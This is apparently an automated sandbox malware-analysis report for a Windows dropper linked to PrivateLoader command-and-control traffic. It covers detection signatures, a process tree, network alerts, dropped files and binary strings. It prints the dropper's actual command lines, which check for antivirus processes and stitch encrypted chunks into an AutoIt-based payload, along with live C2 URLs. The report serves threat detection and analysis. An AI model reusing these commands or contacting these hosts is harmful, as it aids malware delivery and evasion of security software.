Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wWk9NkXYcL.exe

Overview

General Information

Sample name:wWk9NkXYcL.exe
renamed because original name is a hash value
Original sample name:3a1ccc44a0aa6f397c3b2eacf6d4c526.exe
Analysis ID:1510359
MD5:3a1ccc44a0aa6f397c3b2eacf6d4c526
SHA1:62d0b00435893cae171ddf6b2b5d964f608db84e
SHA256:e606e3e72dfaabb3b398d7f7b2b221675038da19080c69c41bd3005066d94f50
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Writes many files with high entropy
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use Short Name Path in Command Line
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wWk9NkXYcL.exe (PID: 3076 cmdline: "C:\Users\user\Desktop\wWk9NkXYcL.exe" MD5: 3A1CCC44A0AA6F397C3B2EACF6D4C526)
    • cmd.exe (PID: 2676 cmdline: "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7148 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 564 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3820 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5724 cmdline: cmd /c md 473638 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6752 cmdline: findstr /V "MaskBathroomCompositionInjection" Participants MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5948 cmdline: cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint Q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Element.pif (PID: 6444 cmdline: Element.pif Q MD5: C63860691927D62432750013B5A20F5F)
        • Element.pif (PID: 6196 cmdline: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif MD5: C63860691927D62432750013B5A20F5F)
          • WerFault.exe (PID: 1964 cmdline: C:\Windows\system32\WerFault.exe -u -p 6196 -s 692 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • choice.exe (PID: 7040 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Element.pif Q, CommandLine: Element.pif Q, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\473638\Element.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2676, ParentProcessName: cmd.exe, ProcessCommandLine: Element.pif Q, ProcessId: 6444, ProcessName: Element.pif
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif, CommandLine: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\473638\Element.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, ParentCommandLine: Element.pif Q, ParentImage: C:\Users\user\AppData\Local\Temp\473638\Element.pif, ParentProcessId: 6444, ParentProcessName: Element.pif, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif, ProcessId: 6196, ProcessName: Element.pif

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2676, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 3820, ProcessName: findstr.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-12T21:26:46.244720+020020547091A Network Trojan was detected192.168.2.749704195.10.205.4880TCP
2024-09-12T21:26:54.244678+020020547091A Network Trojan was detected192.168.2.749705193.233.232.8680TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: wWk9NkXYcL.exeAvira: detected
Source: http://195.10.205.48/api/crazyfish.phpAvira URL Cloud: Label: malware
Source: http://193.233.232.86/api/crazyfish.phpAvira URL Cloud: Label: malware
Source: wWk9NkXYcL.exeReversingLabs: Detection: 34%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.1% probability
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CE7440 CryptReleaseContext,21_2_0000021925CE7440
Source: wWk9NkXYcL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405B98 FindFirstFileW,FindClose,0_2_00405B98
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406559
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_004029F1 FindFirstFileW,0_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58ECE3C GetFileAttributesW,FindFirstFileW,FindClose,21_2_00007FF6C58ECE3C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B2DE0 FindFirstFileExW,21_2_00007FF6C58B2DE0
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\473638Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\473638\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.7:49705 -> 193.233.232.86:80
Source: Network trafficSuricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.7:49704 -> 195.10.205.48:80
Source: Joe Sandbox ViewIP Address: 195.10.205.48 195.10.205.48
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewASN Name: TSSCOM-ASRU TSSCOM-ASRU
Source: unknownDNS traffic detected: query: aSrgKXZxBg.aSrgKXZxBg replaycode: Name error (3)
Source: global trafficHTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Host: 195.10.205.48
Source: global trafficHTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Host: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Host: 195.10.205.48
Source: global trafficHTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Host: 193.233.232.86
Source: wWk9NkXYcL.exeString found in binary or memory: talk: https://www.youtube.$ equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: aSrgKXZxBg.aSrgKXZxBg
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/2%
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925EA2000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E8E000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/api/crazyfish.php
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/api/crazyfish.phpdll
Source: Element.pif, 00000015.00000002.2502705369.0000021925E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86:80/api/crazyfish.php1
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/:%
Source: Element.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/api/crazyfish.php
Source: Element.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/api/crazyfish.php.A
Source: wWk9NkXYcL.exeString found in binary or memory: http://aia.entrust.net/evcs2-chain.p7c01
Source: wWk9NkXYcL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wWk9NkXYcL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wWk9NkXYcL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl.entrust.net/csbr1.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl.entrust.net/evcs2.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl.entrust.net/g2ca.crl0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.entrust.net00
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.entrust.net01
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.entrust.net02
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Element.pifString found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Element.pif, 00000011.00000000.1272166025.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Element.pif, 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: wWk9NkXYcL.exeString found in binary or memory: http://www.entrust.net/rpa0
Source: wWk9NkXYcL.exeString found in binary or memory: http://www.entrust.net/rpa03
Source: wWk9NkXYcL.exeString found in binary or memory: http://www.w3.o
Source: Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: wWk9NkXYcL.exeString found in binary or memory: https://fb.me/%3
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.-
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.-1
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.-1/
Source: wWk9NkXYcL.exeString found in binary or memory: https://github./
Source: wWk9NkXYcL.exeString found in binary or memory: https://github./m
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.2
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.2&
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.2C
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.3
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.c
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.co(
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.co.L
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.com
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.com/
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.com4
Source: Element.pifString found in binary or memory: https://ipgeolocation.io/
Source: Element.pifString found in binary or memory: https://ipinfo.io/
Source: Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/0
Source: wWk9NkXYcL.exeString found in binary or memory: https://mdn.io//1
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Element.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: wWk9NkXYcL.exeString found in binary or memory: https://www.youtube.$
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00404BB4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404BB4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5871990 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,21_2_00007FF6C5871990

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Fox entropy: 7.99792455262Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Residents entropy: 7.99769809583Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Contribution entropy: 7.99686455583Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Florence entropy: 7.99814599407Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Firewall entropy: 7.99819147853Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Heavily entropy: 7.99780337837Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Simply entropy: 7.99793051262Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Infants entropy: 7.99730862271Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Hc entropy: 7.99760369602Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Connect entropy: 7.99781393217Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Dictionaries entropy: 7.99674242767Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Notre entropy: 7.99750585679Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\This entropy: 7.9972677921Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Bullet entropy: 7.99764561119Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Attributes entropy: 7.99815557603Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Reviewing entropy: 7.99662848474Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Right entropy: 7.99726174006Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Net entropy: 7.99704825667Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Amendment entropy: 7.99767566571Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Laughing entropy: 7.99805201402Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Mint entropy: 7.99591090391Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Funded entropy: 7.99648430627Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Staff entropy: 7.99772745248Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\They entropy: 7.99664684989Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Spirit entropy: 7.99749119583Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Music entropy: 7.99813975886Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Astrology entropy: 7.99776283032Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Beside entropy: 7.99820881974Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\473638\Q entropy: 7.9999122724Jump to dropped file
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00403415 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403415
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_0040447D0_2_0040447D
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_0040680A0_2_0040680A
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00406E340_2_00406E34
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C730D021_2_0000021925C730D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C68CB021_2_0000021925C68CB0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6A4D021_2_0000021925C6A4D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C534D021_2_0000021925C534D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6B42021_2_0000021925C6B420
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C703B021_2_0000021925C703B0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4533C21_2_0000021925D4533C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D5831821_2_0000021925D58318
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D2C30021_2_0000021925D2C300
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C566C021_2_0000021925C566C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6E5C021_2_0000021925C6E5C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C7354321_2_0000021925C73543
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6850021_2_0000021925C68500
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E0C021_2_0000021925D6E0C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D440B421_2_0000021925D440B4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4B05021_2_0000021925D4B050
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E01821_2_0000021925D6E018
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E00821_2_0000021925D6E008
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C53FE921_2_0000021925C53FE9
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D52F6821_2_0000021925D52F68
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D44F3421_2_0000021925D44F34
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CE22C021_2_0000021925CE22C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4620C21_2_0000021925D4620C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4513821_2_0000021925D45138
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6DCD021_2_0000021925C6DCD0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4ECF821_2_0000021925D4ECF8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D57C9821_2_0000021925D57C98
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6CCA021_2_0000021925C6CCA0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4FBC821_2_0000021925D4FBC8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C66B6021_2_0000021925C66B60
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C70B2021_2_0000021925C70B20
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C53E4B21_2_0000021925C53E4B
